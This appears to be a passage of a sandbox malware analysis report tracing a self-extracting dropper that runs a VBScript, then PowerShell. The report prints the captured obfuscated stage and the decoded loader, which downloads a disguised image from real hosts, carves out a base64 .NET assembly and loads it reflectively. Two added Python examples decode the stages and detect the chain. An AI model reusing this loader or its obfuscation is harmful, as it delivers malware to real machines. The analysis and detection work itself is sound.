        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.status.atlassian.com/
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bqlf8qjztdtr.statuspage.io
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.cookielaw.org/
        Source: powershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AAE68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC09A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AC032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB8EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://id.atlassian.com/login
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fdfghd%2Ffgd%2
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://id.atlassian.com/logout
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://id.atlassian.com/manage-profile/
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://id.atlassian.com/profile/rest/profile&quot;
        Source: powershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://preferences.atlassian.com
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
        Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.6:49709 version: TLS 1.2

        System Summary

        Source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}
        Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '[...]
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F2D70 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF7E74F2D70
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F1BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF7E74F1BF4
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F5F80 0_2_00007FF7E74F5F80
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F68F0 0_2_00007FF7E74F68F0
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F2EDC 0_2_00007FF7E74F2EDC
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F6F14 0_2_00007FF7E74F6F14
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F1D10 0_2_00007FF7E74F1D10
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F41B4 0_2_00007FF7E74F41B4
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F366E 0_2_00007FF7E74F366E
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F5F7E 0_2_00007FF7E74F5F7E
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F1BF4 0_2_00007FF7E74F1BF4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD348485FA 7_2_00007FFD348485FA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD348483FB 7_2_00007FFD348483FB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34916FCE 7_2_00007FFD34916FCE
        Source: 00wVZ1NU5b.exe Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 5920 bytes, 1 file, at 0x2c +A "lol.vbs", ID 704, number 1, 1 datablock, 0x1503 compression
        Source: 00wVZ1NU5b.exe Binary or memory string: OriginalFilename vs 00wVZ1NU5b.exe
        Source: 00wVZ1NU5b.exe, 00000000.00000000.2103665981.00007FF7E74FE000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 00wVZ1NU5b.exe
        Source: 00wVZ1NU5b.exe Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 00wVZ1NU5b.exe
        Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5168
        Source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engine Classification label: mal100.expl.evad.winEXE@12/8@1/1
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F4838 CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00007FF7E74F4838
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F1BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF7E74F1BF4
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F68F0 LocalAlloc,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA,0_2_00007FF7E74F68F0
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F5F80 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,0_2_00007FF7E74F5F80
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3392:120:WilError_03
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Process created: C:\Windows\System32\cmd.exe cmd /c lol.vbs
        Source: 00wVZ1NU5b.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: 00wVZ1NU5b.exe ReversingLabs: Detection: 15%
        Source: 00wVZ1NU5b.exe Virustotal: Detection: 16%
        Source: unknown Process created: C:\Users\user\Desktop\00wVZ1NU5b.exe "C:\Users\user\Desktop\00wVZ1NU5b.exe"
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Process created: C:\Windows\System32\cmd.exe cmd /c lol.vbs
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G
0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
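Added decoder example, not code from the Joe Sandbox report or from the sample. The `$dosigo` value in the wscript.exe to powershell.exe command line above is ordinary base64 of UTF-16LE text (the same layout `powershell -EncodedCommand` takes) in which every `A` has been replaced by `@`, which is enough to defeat a plain base64 regex. Restoring the `A`s and decoding gives, character for character, the script the second powershell.exe runs. The block below decodes the first 216 characters of that string (copied from the report; the capture itself is truncated), replays the `<<BASE64_START>>`/`<<BASE64_END>>` carving that stage 2 applies to the downloaded "image" against a constructed decoy (the stand-in bytes are not a real .NET assembly), and reverses the first argument handed to `lfsgeddddddda`. The decoy image, the stand-in payload and all function names are assumptions of this example.

```python
"""Decoder for the two PowerShell stages captured in this report.

Added example, not code from the Joe Sandbox report or from the sample.
Taken from the report: the first 216 characters of the $dosigo string and
the five arguments passed to 'lfsgeddddddda'. Everything else (the decoy
image, the stand-in payload, all names) is constructed for this example.
"""
import base64
import binascii
from typing import Optional

# First 216 characters of $dosigo exactly as captured in the wscript.exe ->
# powershell.exe command line above (the capture itself is truncated).
STAGE1_PREFIX = (
    "WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@"
    "UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@"
    "UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@"
)

# Arguments the loader passes to testpowershell.Hoaaaaaasdme.lfsgeddddddda (from the report)
INVOKE_ARGS = ("txt.ihbddiI/selif/gro.makuresadsehteb//:s", "0", "StartupName", "RegAsm", "0")

START_FLAG = b"<<BASE64_START>>"
END_FLAG = b"<<BASE64_END>>"


def decode_stage1(blob: str) -> str:
    """Undo the $dosigo obfuscation.

    The blob is base64 of UTF-16LE text in which every 'A' has been replaced
    by '@'. Putting the 'A's back and decoding yields the stage-2 script.
    """
    restored = blob.replace("@", "A")
    # a truncated capture may end mid-group; drop the torn tail rather than fail
    restored = restored[: len(restored) - len(restored) % 4]
    return base64.b64decode(restored).decode("utf-16-le", errors="replace")


def extract_marked_payload(image: bytes) -> Optional[bytes]:
    """Replay the stage-2 carving step on the downloaded 'image'.

    Stage 2 looks for <<BASE64_START>> and <<BASE64_END>> in the fetched file,
    base64-decodes the text between them and hands the bytes to
    [System.Reflection.Assembly]::Load. Missing or out-of-order markers make
    the script fall through silently, so this returns None in that case.
    """
    start = image.find(START_FLAG)
    end = image.find(END_FLAG)
    if start < 0 or end <= start:
        return None
    start += len(START_FLAG)
    try:
        # validate=False mirrors FromBase64String's tolerance of embedded whitespace
        return base64.b64decode(image[start:end], validate=False)
    except binascii.Error:
        return None


def reverse_argument(arg: str) -> str:
    """The first Invoke() argument is stored reversed in the command line."""
    return arg[::-1]


# Constructed decoy: a JPEG-looking header, filler, then the marker pair around
# a base64 stand-in. The stand-in is NOT a real .NET assembly.
FAKE_ASSEMBLY = b"MZ\x90\x00" + b"\x00" * 12 + b"stand-in payload, not a real assembly"
DECOY_IMAGE = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
    + START_FLAG + base64.b64encode(FAKE_ASSEMBLY) + b"\r\n" + END_FLAG
    + b"\xff\xd9"
)


def triage(blob: str, image: bytes, invoke_args) -> dict:
    """Summarise both stages the way an analyst would record them."""
    payload = extract_marked_payload(image)
    return {
        "stage2_script": decode_stage1(blob),
        "payload_len": 0 if payload is None else len(payload),
        "payload_is_pe": payload is not None and payload[:2] == b"MZ",
        "first_arg_reversed": reverse_argument(invoke_args[0]),
        "other_args": tuple(invoke_args[1:]),
    }


if __name__ == "__main__":
    for key, value in triage(STAGE1_PREFIX, DECOY_IMAGE, INVOKE_ARGS).items():
        print(f"{key}: {value!r}")
```

Running the block prints the decoded prefix `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12`, which is the opening of the second powershell.exe command line recorded above, so the `@` substitution is the only transformation between the two stages. The same decoder applies to the full captured string once the untruncated command line is retrieved from the sandbox's process tree.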
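Added detection example, not code from the Joe Sandbox report. The chain recorded above is a WEXTRACT/IExpress self-extractor (the report lists wextract.pdb, the IXP000.TMP unpack directory and the cabinet.dll/advpack.dll loads) that runs lol.vbs from the user's Temp folder, and the script host then starts PowerShell with the `@`-substituted stage. The block below builds process-creation records that mirror that chain (the image paths and command-line shapes come from the report; the PIDs and the shortened `$dosigo` stand-in are invented) and runs the checks behind the report's key signatures over them: a script host spawning PowerShell, a script launched from `%LOCALAPPDATA%\Temp`, a long base64-shaped token with `A` swapped for `@`, `FromBase64String` followed by a reflective `Assembly::Load`, and a hidden window. It generalises slightly beyond the page by also treating cscript.exe and pwsh.exe as script host and shell.

```python
"""Process-chain checks modelled on this report's signatures.

Added example, not code from the Joe Sandbox report. The image paths and
command-line shapes below come from the chain recorded above; the PIDs and
the shortened $dosigo stand-in are invented for the example.
"""
import os
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# base64 alphabet plus '@', the character the stage-1 loader substitutes for 'A'
SUBST_B64_TOKEN = re.compile(r"[A-Za-z0-9+/@]{80,}")
# script file launched from the per-user Temp tree (IXP000.TMP is where the dropper unpacked)
TEMP_SCRIPT = re.compile(r"\\AppData\\Local\\Temp\\.*\.(vbs|vbe|js|jse|wsf)\b", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)


def _base(image: str) -> str:
    return os.path.basename(image.replace("\\", "/")).lower()


def findings(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Return, per PID, the names of the checks that fired (PIDs with no hits are omitted)."""
    by_pid = {e.pid: e for e in events}
    out: Dict[int, List[str]] = {}
    for e in events:
        hits: List[str] = []
        me = _base(e.image)
        parent = by_pid.get(e.ppid)
        if parent is not None and _base(parent.image) in SCRIPT_HOSTS and me in POWERSHELL:
            hits.append("wscript_spawns_powershell")
        if me in SCRIPT_HOSTS and TEMP_SCRIPT.search(e.cmdline):
            hits.append("script_from_temp")
        if me in POWERSHELL:
            # at least five '@' inside one long base64-shaped token: the $dosigo pattern
            if any(tok.count("@") >= 5 for tok in SUBST_B64_TOKEN.findall(e.cmdline)):
                hits.append("substituted_base64_blob")
            low = e.cmdline.lower()
            if "frombase64string" in low and "reflection.assembly]::load" in low:
                hits.append("reflective_assembly_load")
            if HIDDEN_WINDOW.search(e.cmdline):
                hits.append("hidden_window")
        if hits:
            out[e.pid] = hits
    return out


# Constructed events. Stage 1 is abbreviated to a 256-character stand-in of the
# same shape as the captured $dosigo value.
_STAGE1_STUB = "$dosigo = '" + "WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@" * 8 + "'"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    ProcEvent(1000, 1, r"C:\Users\user\Desktop\00wVZ1NU5b.exe", r'"C:\Users\user\Desktop\00wVZ1NU5b.exe"'),
    ProcEvent(1001, 1000, r"C:\Windows\System32\cmd.exe", "cmd /c lol.vbs"),
    ProcEvent(1002, 1001, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs"'),
    ProcEvent(1003, 1002, PS, f'"{PS}" "{_STAGE1_STUB}"'),
    ProcEvent(1004, 1003, PS,
              f'"{PS}" "$commandBytes = [System.Convert]::FromBase64String($base64Command); '
              '$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes)" -windowstyle hidden -exec'),
    # benign interactive use, for contrast: no check should fire
    ProcEvent(2000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2001, 2000, PS, "powershell.exe -NoProfile Get-Service"),
]


if __name__ == "__main__":
    for pid, names in findings(EVENTS).items():
        print(pid, ", ".join(names))
```

The parent lookup is by PID within the supplied batch, so feed it a window of events that contains the parents (a Sysmon Event ID 1 export works, with `ParentProcessId` mapped to `ppid`). The `@` check deliberately needs several substitutions inside one long token; a single `@` in an e-mail address on a command line will not trip it.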
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe | Section loaded: cabinet.dll
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe | Section loaded: feclient.dll
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe | Section loaded: advpack.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: edputil.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: windows.staterepositoryps.dll
